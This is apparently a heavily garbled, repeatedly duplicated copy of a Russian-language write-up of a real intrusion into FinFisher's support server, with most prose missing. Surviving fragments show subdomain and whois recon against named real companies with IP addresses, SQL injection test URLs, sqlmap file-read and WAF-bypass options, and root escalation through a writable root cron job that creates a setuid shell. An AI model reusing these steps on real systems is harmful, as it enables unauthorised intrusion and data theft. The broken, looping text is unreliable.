root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
